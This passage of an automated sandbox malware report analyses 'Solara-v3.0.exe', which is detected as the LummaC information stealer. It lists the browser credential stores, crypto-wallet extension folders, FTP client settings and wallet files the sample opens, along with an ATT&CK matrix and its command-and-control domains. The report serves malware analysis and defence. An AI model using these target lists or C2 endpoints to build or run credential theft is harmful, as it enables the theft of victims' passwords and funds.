                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2193758527.000000000331F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2215763251.0000000003332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.2193931805.0000000003331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR
                    Source: Yara matchFile source: 4.2.Solara-v3.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Solara-v3.0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		Boot or Logon Initialization Scripts211
                    Process Injection                    		3
                    Obfuscated Files or Information                    		LSASS Memory11
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)1
                    Software Packing                    		Security Account Manager33
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading                    		NTDS1
                    Query Registry                    		Distributed Component Object Model3
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                    Virtualization/Sandbox Evasion                    		LSA Secrets241
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                    Process Injection                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Solara-v3.0.exe37%ReversingLabsWin32.Trojan.LummaC
                    Solara-v3.0.exe51%VirustotalBrowse
                    Solara-v3.0.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://lev-tolstoi.com/p100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/m100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/i100%Avira URL Cloudmalware
                    https://scentniej.buzz/api0100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/w100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/apiinhpmnjffcofjonbfbgaoc100%Avira URL Cloudmalware
                    https://appliacnesot.buzz/api100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/apiifaf)100%Avira URL Cloudmalware
                    https://cashfuzysao.buzz/apiB100%Avira URL Cloudmalware
                    https://inherineau.buzz/api100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/api2Y61100%Avira URL Cloudmalware
                    https://hummskitnj.buzz/api100%Avira URL Cloudmalware
                    https://lev-tolstoi.co0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.55.153.106
                    		truefalse
                      		high
                      lev-tolstoi.com
                      		104.21.66.86
                      		truefalse
                        		high
                        cashfuzysao.buzz
                        		unknown
                        		unknowntrue
                          		unknown
                          scentniej.buzz
                          		unknown
                          		unknownfalse
                            		high
                            inherineau.buzz
                            		unknown
                            		unknownfalse
                              		high
                              prisonyfork.buzz
                              		unknown
                              		unknownfalse
                                		high
                                rebuildeso.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  appliacnesot.buzz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    hummskitnj.buzz
                                    		unknown
                                    		unknownfalse
                                      		high
                                      mindhandru.buzz
                                      		unknown
                                      		unknownfalse
                                        		high
                                        screwamusresz.buzz
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          scentniej.buzzfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              rebuildeso.buzzfalse
                                                		high
                                                appliacnesot.buzzfalse
                                                  		high
                                                  screwamusresz.buzzfalse
                                                    		high
                                                    cashfuzysao.buzzfalse
                                                      		high
                                                      inherineau.buzzfalse
                                                        		high
                                                        https://lev-tolstoi.com/apifalse
                                                          		high
                                                          hummskitnj.buzzfalse
                                                            		high
                                                            mindhandru.buzzfalse
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/chrome_newtabSolara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://player.vimeo.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/ac/?q=Solara-v3.0.exe, 00000004.00000003.2118247184.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118198895.0000000005A5C000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2118406859.0000000005A59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://lev-tolstoi.com/wSolara-v3.0.exe, 00000004.00000002.3288014085.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2233799015.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880061716.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://steamcommunity.com/?subsection=broadcastsSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://lev-tolstoi.com/pSolara-v3.0.exe, 00000004.00000003.2168376117.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2194080227.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168921255.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2168753100.0000000005A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://store.steampowered.com/subscriber_agreement/Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.gstatic.cn/recaptcha/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.valvesoftware.com/legal.htmSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.youtube.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.comSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lev-tolstoi.com/mSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englSolara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lev-tolstoi.com/iSolara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117482449.0000000003331000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://s.ytimg.com;Solara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiSolara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lev-tolstoi.com/eSolara-v3.0.exe, 00000004.00000003.2073106626.0000000003332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Solara-v3.0.exe, 00000004.00000003.2094411442.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094464429.0000000003373000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2073075875.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
